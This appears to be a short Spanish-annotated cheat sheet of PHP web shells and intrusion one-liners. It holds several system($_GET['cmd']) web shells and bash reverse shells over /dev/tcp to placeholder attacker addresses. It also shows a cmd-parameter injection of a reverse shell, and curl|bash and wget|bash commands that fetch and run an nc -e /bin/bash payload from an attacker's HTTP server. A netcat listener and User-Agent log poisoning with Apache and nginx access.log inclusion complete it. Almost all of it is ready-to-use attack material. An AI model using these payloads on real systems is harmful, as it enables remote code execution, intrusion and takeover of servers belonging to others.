<?php system("bash -c 'bash -i &>/dev/tcp/<IP>/<port> <&1'");?>
<?php echo file_get_contents('/path/to/file'); ?>
<?php system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET['cmd']); ?>
# Uso en URL por parámetro
cat.php?cmd=bash -c "bash -i <%26 /dev/tcp/<IPa>/<port> 0>%261"
# Uso por CURL
curl -s -X GET "http://<IP>/cat.php" | bash
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
----------------------------------------------------------------------------------------------
echo "nc -e /bin/bash <IPa> 1234" > index.html; python3 -m http.server 80
nc -lvnp 1234
# Llamada en URL
cat.php?parametro=curl <IPa>/index.html|bash
cat.php?parametro=wget -qO- <IPa>/index.html|bash
------------------------------------------------------------------------------------------------
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://<IPv>"
User-Agent: <?php system($_GET['cmd']); ?>
/var/log/apache2/access.log&cmd=id
/var/log/nginx/access.log&cmd=id
----------------------------------------------------------------------------------------------
